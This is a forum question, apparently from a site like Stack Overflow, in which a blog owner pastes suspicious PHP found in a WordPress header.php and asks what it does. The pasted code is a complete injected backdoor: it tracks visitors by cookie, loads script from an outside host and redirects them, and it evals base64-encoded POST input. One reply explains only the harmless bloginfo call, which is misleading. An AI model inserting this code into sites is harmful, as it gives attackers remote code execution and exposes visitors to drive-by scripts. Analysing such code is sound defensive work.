Possible Duplicate:
Got Hacked – Anyone know what this PHP Code Does?
I just found this on one of my blogs header.php file, I will like to know if somebody can say what is that ? (scroll to the right so see all the code)
Thanks
<meta http-equiv="Content-Type" content="<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
What I will like to know is what does this code. (scroll to the right so see all the code)
Thanks!
Double douplicate:
Here: Got Hacked – Anyone know what this PHP Code Does?
and
Here: What this php script will do ? is it Malicious php Code?
Now tis is a new practice affecting wordpress ???
From the wordpress function reference for bloginfo:
In this special case:
Basically it fetches the content type (html_type) and the charset from wordpress and puts it into the HTML header of the page it creates.